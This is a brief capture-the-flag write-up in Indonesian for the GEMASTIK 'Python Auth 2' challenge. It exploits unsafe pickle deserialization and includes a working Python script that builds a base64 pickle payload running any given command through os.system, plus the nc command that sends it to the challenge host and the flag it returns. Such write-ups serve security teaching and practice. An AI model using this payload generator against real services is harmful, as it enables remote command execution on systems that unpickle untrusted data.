Python Auth 2 - 100 Points

nc target.netsec.gemastik.ui.ac.id 60001

POC

Pada python auth2 input kita di masukan kedalam pickle yang dapat menyebabkan Remote Command Execution

kita bisa menggenerate RCE dalam pickle menggunakan script berikut:

import cPickle
import os
import sys
import base64

DEFAULT_COMMAND = "cat flag.txt"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    def __reduce__(self):
        return (os.system,(COMMAND,))

print base64.b64encode(cPickle.dumps(PickleRce()))
echo "Y3Bvc2l4CnN5c3RlbQpwMQooUydjYXQgZmxhZy50eHQnCnAyCnRScDMKLg==" |nc target.netsec.gemastik.ui.ac.id 60003 
GEMASTIK{serialization_attack_is_popular_nowadays}

Flag: GEMASTIK{serialization_attack_is_popular_nowadays}

results matching ""

    No results matching ""